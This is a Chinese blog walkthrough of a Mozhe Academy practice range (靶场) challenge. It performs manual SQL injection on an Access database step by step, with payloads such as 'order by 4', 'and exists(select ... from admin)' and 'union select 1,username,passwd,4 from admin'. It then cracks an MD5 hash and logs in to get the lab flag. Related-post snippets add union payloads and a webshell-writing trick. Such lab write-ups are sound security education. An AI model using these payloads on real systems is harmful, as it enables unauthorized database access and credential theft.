墨者学院;sql手工注入;access;在线靶场

最新推荐文章于 2024-04-17 10:42:02 发布
最新推荐文章于 2024-04-17 10:42:02 发布
阅读量730 收藏 2
点赞数
文章标签: java servlet jvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaochenhang/article/details/126437065
版权

1、注册账号,启动环境;购买墨币;

2、 得到端口号和地址;

 3、进入靶场;

 

4、输入' 成功闭合报错,有注入漏洞;

 

5、access数据库没有库名,都是表名;

order by 4

判断出四个字段

6、枚举关键表名:正常则存在admin表;通常access数据库都有admin表;

and exists(select count(*) from admin)

7、 查找回显字段

union select 1,2,3,4 from admin

8、 枚举字段:正常则页面不报错;通常access表会存在以下三个字段;

id,username,passwd

and exists(select id from admin) 

 and exists(select username from admin)

 

and exists(select password from admin)

这里枚举失败,翻车;

 

and exists(select passwd from admin)

9、爆一下用户账户和密码;

union select 1,username,passwd,4 from admin 

md5 解码一下;

MD5编码是由数字与字母组成,因此看到位数以及字母组成形式的字符可以迅速判断可能是MD5编码。

 

10、这里登陆一下

mozhe

27737201

 

 

 

okok

恭喜你 moke 成功登录用户管理后台,KEY: mozhee7cc35d6a83a8978b4a44f56f6d

 

小乘杭
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入靶场实操
m0_46104808的博客
10-27 1524
sql注入漏洞利用
portswigger靶场sql注入(三)
wzhwzh123321的博客
01-30 489
回显正常,则列数为2,可以通过select banner from v$version这条语句查询Oracle数据库的版本信息,构造payload如下,成功查询到Oracle数据库的版本信息。Oracle数据库执行select语句时,必须指定一个表名,且Oracle数据库内置一个表dual,则可以通过该表名完成select语句的查询。打开靶场,抓包,使用union select修改列数确定为几列,当列数为1时回显报错。查询这两列的数据,成功查询到用户名为administrator的用户的用户名和密码。
DVWA靶场SQL注入通关详解(1),2024年最新赶紧学起来
weixin_58134620的博客
04-17 786
接下来查询表名,查询语句为:1 union select 1,table_name from information_schema.tables where table_schema=database()#。通常,SQL注入攻击的目标是Web应用程序,因为Web应用程序通常需要与数据库进行交互,并且大多数Web应用程序使用的是SQL语言。接下来判断字段数,当查询语句为1 or 1=1 order by 2时,页面能正常显示,但是当把2换成3时,页面就会报错,因此这里的字段数为2。没有进行敏感字符过滤。
【网络安全 ---- 靶场搭建】凡诺企业网站管理系统靶场详细搭建过程(asp网站,练习Access数据库的 sql注入
m0_67844671的博客
10-09 1305
【网络安全 ---- 靶场搭建】凡诺企业网站管理系统靶场详细搭建过程(asp网站,练习sql注入
sql注入靶场练习
weixin_46976845的博客
03-19 5847
pass.1 发现id注入点,尝试联合注入 id=1’ union select 1,database().3 --+或者 id=1’ union select 1,database().3#’ 返回 Welcome Dhakkan Your Login name:Dumb Your Password:Dumb 跑sqlmap 得知数据库账户密码都为root pass.2 注入与1相同 pass.3 括号闭合 注意 ?id=1’) union select 1,database().3 --+ pa
渗透测试---手把手教你SQL注入(7)---Access数据库注入
weixin_52796034的博客
10-16 472
在讨论SQL注入中的Access数据库注入时,首先需要了解Access数据库的一些基本知识。Microsoft Access 是一种关系型数据库管理系统,可用于存储、管理和检索数据。虽然Access通常用于较小的数据库和单服务器环境,但它也可以用于大型企业和互联网应用。 此外,Access与其他数据库管理系统(如MySQLSQL Server等)在处理SQL注入方面有所不同。
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
spring IOC实现(墨者革离)
12-12
该代码主要用于spring IOC的实现(墨者革离),模拟一个城门叩问的编剧场景
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 3.7(更新)
11-03
在线提出您的系统安全问题,不仅有专家及时解答,更有24小时网友互助,让墨者的互动式咨询服务一步到位。 如您的电脑未安装杀毒软件,为彻底清除其中已存的病毒,推荐下载墨者安全专家豪华版,内含终身免费升级的...
墨者安全专家 v3.7.2.9
03-12
软件介绍 墨者安全专家第二代为您彻底免疫未知病毒,并且提供终身免费国际杀毒品牌趋势科技的优质产品!...在线提出您的系统安全问题,不仅有专家及时解答,更有24小时网友互助,让墨者的互动式咨询服务一步到位。
渗透学习测试网站源码打包带走
05-24
渗透学习测试网站源码打包带走。asp+access注入源码;cookie注入源码;DVWA漏洞平台测试源码;ewebeditor;fck漏洞源码;fck突破“_”源码;iis6.0解析漏洞源码;phpcms2008;php包含漏洞源码;WEBSHELL箱子系统V2.0;xss漏洞测试源码;搜索注入源码;制作高级webshell后门附带工具。
靶机-佛山发发鱼喊access注入
05-09
靶机-佛山发发鱼喊access注入!很多视频教程中使用的靶机!默认含参数过滤,为了方便新人测试我已经去掉了参数过滤!
测试具有44个漏洞点的简单小靶场-SQL注入
虚闻界的博客
08-11 1240
关于常见SQL注入的经验及小技巧,以及自己的一些学习经历
墨者靶场 SQL手工注入漏洞测试(Access数据库)
曹振国的博客
06-20 512
Access 注入关于Access:进入环境:1.寻找注入点2.查询字段数3.猜测它有admin表4.猜字段5.寻找输出点6.查询username,passwd字段md5解密,进入后台拿到key值 关于AccessAccess 是表的集合 Access 数据库的结构 => 表、字段 select xxx from 表 => 正常查询 想知道access的表名你只能去猜 常见的表: admin news job work admin_user user 进入环境: 1.寻找注入点 ?id=
SQL手工注入漏洞测试—Access数据库(墨者学院靶场
ISNS的博客
07-09 1475
靶场: https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe 1.点击滚动的通知。 点击后进入页面: 2.判断是否为注入点。 3.判断字段数量。 采用二分法,从10开始查询。结果显示有4个字段: 因为Access用联合语句显示可显字段时,必须要“from 表名”,所以需要先猜表名。 4.猜...
SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
T1ngSh0w的博客
09-07 1230
SQLServer数据库注入-墨者学院-SQL手工注入漏洞测试(Sql Server数据库)详细讲解
Access注入之cookie注入(含靶场练习)
weixin_60777183的博客
08-31 631
一.cookie注入简介 Access → 数据库的一种。除了Access,还有mysql,mssqlsql server),Oracle等 cookie注入→特殊的传参方式产生的注入。所以cookie注入只跟传参方式有关,跟别的一概没有关系。 什么是Cookie?Cookie是代表身份信息的一串字符串,网站根据Cookie来识别你是谁,如果获取了管理员的Cookie,可以无需密码直接登录管理员的账号。类似门禁卡、身份证。 二.怎么修改cookie 1.方法一:浏览器修改(不推荐) 浏..
墨者学院 - SQL注入实战(防注入)-Access
多崎巡礼的博客
09-04 1503
使用御剑扫描,发现sqlin.asp文件,打开发现是乱码 必应一下 access通用防注入系统也可以知道注入信息会被记录到sqlin.asp中,这相当于一个文件上传漏洞,可以直接在sqlin.asp中写入一句话 在url后面添加一句话代码and 1=<%eval request("chopper")%>,在回显的信息中发现被记录的注入信息只有and 1=,后面的一句话被过滤了 ...
墨者-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值